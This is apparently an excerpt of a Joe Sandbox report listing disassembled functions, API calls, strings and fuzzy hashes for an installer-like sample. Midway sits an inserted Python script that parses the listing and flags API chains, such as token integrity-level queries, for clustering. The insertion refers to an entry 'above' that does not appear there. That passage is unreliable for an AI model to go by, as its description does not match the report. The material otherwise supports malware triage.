                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CountSleepTick
                                                                                            • String ID:
                                                                                            • API String ID: 2227064392-0
                                                                                            • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                            • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                            • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                            • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                            • String ID:
                                                                                            • API String ID: 215268677-0
                                                                                            • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                            • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                            • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                            • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
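The two entries above (the RegDeleteValueA / RemoveFontResourceA / SendNotifyMessageA function and the OpenProcessToken / GetTokenInformation(TokenIntegrityLevel) function) are the kind of API chains an analyst wants to pull out of this listing and pivot on. The following is an added example, not Joe Sandbox's code and not part of the report: it parses entries in the plugin's text layout into structured records and flags API sequences with simple ordered-subsequence rules. The sample text is copied from entries on this page and trimmed; the rule names are this example's own. SendNotifyMessageA(0000FFFF, 0000001D) is HWND_BROADCAST with WM_FONTCHANGE (0x001D), which is why the second rule keys on those arguments.

```python
"""Parse Joe Sandbox 'IDA Plugin' function entries and flag notable API chains.

Added example, not part of the report. The sample below is copied from
entries shown on this page and trimmed; rule names are this example's own.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: two complete entries plus a trailing partial one,
# in the report's own layout (bullet lines under APIs / Strings / Similarity).
SAMPLE_REPORT = """\
APIs
• GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001), ref: 0047820D
• OpenProcessToken.ADVAPI32(00000000,00000008,?,?), ref: 00478213
• GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008), ref: 00478235
• CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel), ref: 00478246
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0
• Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
• Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\\CurrentControlSet\\Control\\Windows,;H), ref: 0042DE38
• RegDeleteValueA.ADVAPI32(?,00000000,00000082), ref: 00455DD8
• RegCloseKey.ADVAPI32(00000000,?,00000000), ref: 00455DE1
• RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
Similarity
• API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
• String ID:
• Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
• Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
Strings
• Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function ADDR: ".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$"
)
# "• some text, xrefs: ADDR"
STRING_RE = re.compile(r"^\s*•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
# "• Key: value" (Similarity and Memory Dump Source fields)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+): ?(?P<value>.*)$")


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)     # (name, module, args, ref)
    strings: list = field(default_factory=list)  # (text, xref)
    fields: dict = field(default_factory=dict)   # e.g. "Opcode Fuzzy Hash"


def parse_entries(text):
    """Split the plugin listing into one FunctionEntry per function.

    "Instruction Fuzzy Hash" is the last field of every entry, so it closes
    the current record; a trailing partial entry without it is dropped.
    """
    entries, current = [], FunctionEntry()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            current.apis.append((m["name"], m["module"], m["args"], m["ref"]))
            continue
        m = STRING_RE.match(line)
        if m:
            current.strings.append((m["text"], m["ref"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m["key"]] = m["value"]
            if m["key"] == "Instruction Fuzzy Hash":
                entries.append(current)
                current = FunctionEntry()
    return entries


# rule name -> (API names that must appear in this order, argument marker that must appear)
RULES = {
    # Caller reads its own integrity level: OpenProcessToken then
    # GetTokenInformation with TokenInformationClass 0x12 (TokenIntegrityLevel).
    "token-integrity-level-query": (["OpenProcessToken", "GetTokenInformation"], "TokenIntegrityLevel"),
    # Font removed, then every top-level window told about it:
    # SendNotifyMessageA(HWND_BROADCAST=0xFFFF, WM_FONTCHANGE=0x001D).
    "font-removal-broadcast": (["RemoveFontResourceA", "SendNotifyMessageA"], "0000FFFF,0000001D"),
}


def _in_order(names, wanted):
    """True if every name in `wanted` occurs in `names` in the given order (gaps allowed)."""
    it = iter(names)
    return all(w in it for w in wanted)


def match_rules(entries):
    """Return (rule, ref of the call carrying the marker, opcode fuzzy hash) per hit."""
    hits = []
    for e in entries:
        names = [a[0] for a in e.apis]
        for rule, (wanted, marker) in RULES.items():
            if _in_order(names, wanted) and any(marker in a[2] for a in e.apis):
                ref = next(a[3] for a in e.apis if marker in a[2])
                hits.append((rule, ref, e.fields.get("Opcode Fuzzy Hash", "")))
    return hits


if __name__ == "__main__":
    for rule, ref, fuzzy in match_rules(parse_entries(SAMPLE_REPORT)):
        print(f"{rule:30} ref={ref} opcode_fuzzy={fuzzy[:16]}...")
```

Feed it the whole listing rather than the sample and the returned Opcode/Instruction Fuzzy Hash values give a ready pivot for clustering other samples that share the same installer stub functions; the rules are deliberately narrow and match only on API order plus an argument the report itself shows.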
                                                                                            APIs
                                                                                            • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                            • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                            • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                            • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                            • String ID:
                                                                                            • API String ID: 2280970139-0
                                                                                            • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                            • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                            • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                            • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                            APIs
                                                                                            • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocHandleLockUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 2167344118-0
                                                                                            • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                            • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                            • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                            • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                            Strings
                                                                                            • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                            • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                            • API String ID: 3535843008-1938159461
                                                                                            • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                            • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                            • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                            • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                            • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                            Strings
                                                                                            • Will not restart Windows automatically., xrefs: 004836F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveForeground
                                                                                            • String ID: Will not restart Windows automatically.
                                                                                            • API String ID: 307657957-4169339592
                                                                                            • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                            • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                            • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                            • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                            APIs
                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                            • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                            Strings
                                                                                            • Extracting temporary file: , xrefs: 004763EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileTime$Local
                                                                                            • String ID: Extracting temporary file:
                                                                                            • API String ID: 791338737-4171118009
                                                                                            • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                            • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                            • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                            • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                            Strings
                                                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                            • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                            • API String ID: 0-1974262853
                                                                                            • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                            • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                            • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                            • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                            Strings
                                                                                            • %s\%s_is1, xrefs: 00478F10
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1598650737
                                                                                            • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                            • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                            • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                            • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecuteMessageSendShell
                                                                                            • String ID: open
                                                                                            • API String ID: 812272486-2758837156
                                                                                            • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                            • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                            • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                            • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                            APIs
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                            • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                            • String ID: <
                                                                                            • API String ID: 893404051-4251816714
                                                                                            • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                            • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                            • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                            • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                            • String ID: )
                                                                                            • API String ID: 2227675388-1084416617
                                                                                            • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                            • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                            • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                            • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window
                                                                                            • String ID: /INITPROCWND=$%x $@
                                                                                            • API String ID: 2353593579-4169826103
                                                                                            • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                            • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                            • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                            • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                            APIs
                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                            Strings
                                                                                            Memory Dump Source
